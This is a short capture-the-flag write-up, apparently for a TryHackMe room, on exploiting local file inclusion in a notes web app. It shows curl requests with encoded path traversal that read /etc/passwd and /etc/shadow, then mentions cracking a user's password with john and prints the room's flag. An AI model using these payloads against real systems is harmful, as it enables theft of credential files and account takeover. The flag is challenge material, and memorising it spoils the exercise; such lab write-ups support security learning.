LFI Notes

nmap
22
80

http://10.10.107.83         --in source code
<script src="/js/jquery.min.js"></script>
    <script src="/js/bootstrap.min.js"></script>
    <script>
      function getNote(note, id) {
        const url = '/get-file/' + note.replace(/\//g, '%2f')
        $.getJSON(url,  function(data) {
          document.querySelector(id).innerHTML = data.info.replace(/(?:\r\n|\r|\n)/g, '<br>');
        })
      }
      // getNote('server.js', '#note-1')
      getNote('views/notes/note1.txt', '#note-1')
      getNote('views/notes/note2.txt', '#note-2')
      getNote('views/notes/note3.txt', '#note-3')
    </script>

we can see to view a page we need to change / with %2f
exploiting that with LFI
curl http://10.10.107.83/get-file/views%2fnotes%2fnote1.txt     ---[redacted] notes
curl http://10.10.107.83/get-file/..%2f..%2f..%2fetc%2fpasswd  --got LFI and users
curl http://10.10.107.83/get-file/..%2f..%2f..%2fetc%2fshadow   --also password of charlie
''''

crack password withn john charlie:[redacted]

[redacted sensitive answer]

Hawaii -via note3

2. Read /etc/shadow and crack Charlies password.

[redacted]

[redacted sensitive answer]

THM{4ea2adf842713ad3ce0c1f05ef12256d}

=============================================